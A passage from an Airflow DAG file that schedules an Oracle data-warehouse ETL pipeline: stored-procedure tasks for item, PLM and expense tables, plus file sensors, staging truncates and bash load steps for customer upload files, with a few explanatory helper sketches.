max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_SCM"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_SCM")
D_ODS_SCM = airflow.DAG(
"D_ODS_SCM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "W_ODS_QAM"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "W_ODS_QAM")
W_ODS_QAM = airflow.DAG(
"W_ODS_QAM",
tags=["PRD", data_stage[0]],
schedule_interval="@weekly",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "M_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "M_ODS_CUS")
M_ODS_CUS = airflow.DAG(
"M_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@monthly",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "Y_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "Y_ODS_CUS")
Y_ODS_CUS = airflow.DAG(
"Y_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@yearly",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
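# Every job flow above repeats the same prefix/stage parsing. A pure-Python
# sketch of that convention, useful for unit tests; parse_flow_name and _FREQ
# are hypothetical helpers, not part of the generated file:

```python
import re

# Frequency comes from the name's first letter (D/W/M/Y), the data stage from
# the token between the first two underscores; I_SDM_CMN is special-cased.
_FREQ = {'D': '@daily', 'W': '@weekly', 'M': '@monthly', 'Y': '@yearly'}

def parse_flow_name(job_flow_name):
    if job_flow_name == 'I_SDM_CMN':
        stage = 'ODS'
    else:
        stage = re.findall(r"_(.*?)_", job_flow_name)[0]
    return _FREQ.get(job_flow_name[0], '@once'), stage
```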
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_SYSTEM_ITEMS_B"
MTL_SYSTEM_ITEMS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_COLUMNS"
FND_COLUMNS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_LOOKUP_TYPES"
FND_LOOKUP_TYPES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_LOOKUP_VALUES"
FND_LOOKUP_VALUES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_TABLES"
FND_TABLES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CATEGORIES_B"
MTL_CATEGORIES_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CATEGORY_SETS_B"
MTL_CATEGORY_SETS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CUSTOMER_ITEMS"
MTL_CUSTOMER_ITEMS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_CATALOG_GROUPS_B"
MTL_ITEM_CATALOG_GROUPS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_CATEGORIES"
MTL_ITEM_CATEGORIES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_STATUS_TL"
MTL_ITEM_STATUS_TL = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "PRJ_WORKTIMEDATA"
PRJ_WORKTIMEDATA = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_MODEL"
XXPLM_MODEL = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_PROJECT"
XXPLM_PROJECT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_TFD"
XXPLM_TFD = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "Z_CDOCUMENT_CHECKING_RULE"
Z_CDOCUMENT_CHECKING_RULE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_XXPLM_MODEL_CHECKRULE_V"
MV_XXPLM_MODEL_CHECKRULE_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_EC_CHANGE_TYPE"
XXPLM_EC_CHANGE_TYPE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "NSP_REQ_HEADERS"
NSP_REQ_HEADERS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "NSP_REQ_LINES"
NSP_REQ_LINES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_HEADER_TW"
EFLOW_PCS_HEADER_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_LINEEE_TW"
EFLOW_PCS_LINEEE_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_LINEER_TW"
EFLOW_PCS_LINEER_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_BTMS_EXPENSEPROJECT_TW"
EFLOW_BTMS_EXPENSEPROJECT_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_PROJECT_ACTIVITY_V"
MV_PROJECT_ACTIVITY_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_XXPLM_CFDMETADATA_V"
MV_XXPLM_CFDMETADATA_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PLM_CATEGORY"
SDM_PLM_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ITEM"
SDM_ITEM = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ECN_REASON"
SDM_ECN_REASON = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_XXPLM_EC"
SDM_XXPLM_EC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ECN_CASE_AFTER_MP"
SDM_ECN_CASE_AFTER_MP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_COMPLETION_RATE"
SDM_CDOC_COMPLETION_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_UPLOAD_CDOC_COUNT"
SDM_UPLOAD_CDOC_COUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TOTAL_CDOC_COUNT"
SDM_TOTAL_CDOC_COUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PROJECT_CODE"
SDM_PROJECT_CODE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TOOLING_TOTAL_EXPENSE"
SDM_TOOLING_TOTAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DMST_AND_INTL_TRAVEL_EXP"
SDM_DMST_AND_INTL_TRAVEL_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_RD_LABOR_HOURS_EXPENSE"
SDM_RD_LABOR_HOURS_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TESTING_EXPENSE"
SDM_TESTING_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CTF_EXPENSE"
SDM_CTF_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EQT_EXPENSE"
SDM_EQT_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EPR_MFG_SAMPLE_BUILD_EXP"
SDM_EPR_MFG_SAMPLE_BUILD_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EPR_MFG_CONVERSION_COST"
SDM_EPR_MFG_CONVERSION_COST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_PLANNED_DEV_TIME"
SDM_CDOC_PLANNED_DEV_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PROD_DEV_MLST_DELAY_RATE"
SDM_PROD_DEV_MLST_DELAY_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_DELAY_TIME"
SDM_CDOC_DELAY_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PRODUCT_ACTUAL_EXPENSE"
SDM_PRODUCT_ACTUAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PRODUCT_EXPENSE_BUDGET"
SDM_PRODUCT_EXPENSE_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_PROD_DEV_MLST_DELAY_RATE"
FCT_PROD_DEV_MLST_DELAY_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_ECN_CASE_AFTER_MP"
FCT_ECN_CASE_AFTER_MP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_EPR_MFG_CONVERSION_COST"
FCT_EPR_MFG_CONVERSION_COST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_TOOLING_TOTAL_EXPENSE"
FCT_TOOLING_TOTAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_DMST_AND_INTL_TRAVEL_EXP"
FCT_DMST_AND_INTL_TRAVEL_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_RD_LABOR_HOURS_EXPENSE"
FCT_RD_LABOR_HOURS_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_TESTING_EXPENSE"
FCT_TESTING_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_ITEM"
DIM_ITEM = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_PLM_CATEGORY"
DIM_PLM_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_ECN_REASON"
DIM_ECN_REASON = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_PROJECT_CODE"
DIM_PROJECT_CODE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
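# Each ODS-MAIN task above calls a stored procedure named after the task id,
# passing the templated :END_DT_CHAR bind. A sketch of that string assembly;
# build_sp_call is a hypothetical helper, not part of the generated file:

```python
# Reproduces the PL/SQL block each ODS-MAIN task sends to Oracle:
# Begin SQLEXT.<TASK_ID>_SP(:END_DT_CHAR); End;
def build_sp_call(task_id):
    return "Begin SQLEXT." + task_id + "_SP(" + ":END_DT_CHAR" + "); End;"
```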
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Tier1_OEM_Mapping_Table_WH"
ODS_UC_Tier1_OEM_Mapping_Table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Tier1_OEM_Mapping_Table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Tier1_OEM_Mapping_Table_STG"
UC_Tier1_OEM_Mapping_Table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Tier1_OEM_Mapping_Table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Tier1_OEM_Mapping_Table_LD"
ODS_UC_Tier1_OEM_Mapping_Table_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Tier1_OEM_Mapping_Table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Tier1_OEM_Mapping_Table"
UC_Tier1_OEM_Mapping_Table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
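# The file-fed tables each get four tasks: a WATCH FileSensor, an ISQL
# truncate, an ODS-UIMP bash load, and a final SQL merge (this chunk does not
# show the dependency wiring between them). The sensor path follows one
# template; build_watch_path is a hypothetical helper sketching it:

```python
# Builds the templated filepath the WATCH FileSensors poll:
# <DIR_SOURCE><freq_dir>/<domain>/<table>_<yyyymmdd>.D
def build_watch_path(freq_dir, domain, table):
    return ("{{ var.value.DIR_SOURCE }}" + freq_dir + "/" + domain + "/"
            + table + "_{{ds_nodash}}.D")
```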
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_Model_Name_WH"
ODS_UC_Customer_Model_Name_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_Model_Name_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_Model_Name_STG"
UC_Customer_Model_Name_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_Model_Name"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_Model_Name_LD"
ODS_UC_Customer_Model_Name_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_Model_Name"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_Model_Name"
UC_Customer_Model_Name = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Pre_Project_information_WH"
ODS_UC_Pre_Project_information_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Pre_Project_information_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Pre_Project_information_STG"
UC_Pre_Project_information_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Pre_Project_information"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Pre_Project_information_LD"
ODS_UC_Pre_Project_information_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Pre_Project_information"
)
# JOB_TYPE=SQL
my_taskid = "UC_Pre_Project_information"
UC_Pre_Project_information = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
